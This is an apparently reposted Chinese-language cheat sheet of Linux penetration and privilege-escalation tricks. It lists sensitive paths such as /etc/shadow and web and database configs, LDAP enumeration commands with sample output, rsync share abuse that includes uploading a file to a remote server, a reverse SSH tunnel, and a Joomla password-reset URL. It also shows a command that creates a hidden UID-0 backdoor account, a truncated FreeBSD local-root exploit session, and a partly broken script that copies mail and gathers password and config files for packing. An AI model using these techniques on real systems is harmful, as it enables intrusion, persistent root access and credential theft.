Linux 渗透与提权技巧
一次性进群,长期免费索取教程,没有付费教程。
教程列表见微信公众号底部菜单
进微信群回复公众号:微信群;QQ群:16004488
收集各种Linux渗透技巧与提权版本,方便小伙伴们在日后的渗透测试中能够事半功倍。
Linux 系统下的一些常见路径:
/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
ldap 渗透技巧:
cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
实战
cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
渗透实战
1、返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain
dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin
dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous
2、查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain
3、查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
<strong> </strong>
NFS 渗透技巧:
列举IP
showmount -e ip
rsync渗透技巧:
1、查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book
看相应的下级目录(注意一定要在目录后面添加上/)
rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
2、下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3、向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
squid渗透技巧:
nc -vv 91ri.org 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
SSH端口转发:
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
joomla渗透小技巧:
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
重新设置密码
index.php?option=com_user&view=reset&layout=confirm
Linux添加UID为0的root用户:
useradd -o -u 0 nothack
freebsd本地提权:
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()
tar 文件夹打包:
tar打包
tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB d:\web*.rar
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
系统信息收集:
for linux:
#!/bin/bash
echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo 'u'r id is' `id`
echo ###atq&crontab#####
atq
crontab -l
echo #####about var#####
set
echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh
echo ######service####
chkconfig --list
for i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
希望本文对您有所帮助或启发。
【推荐书籍】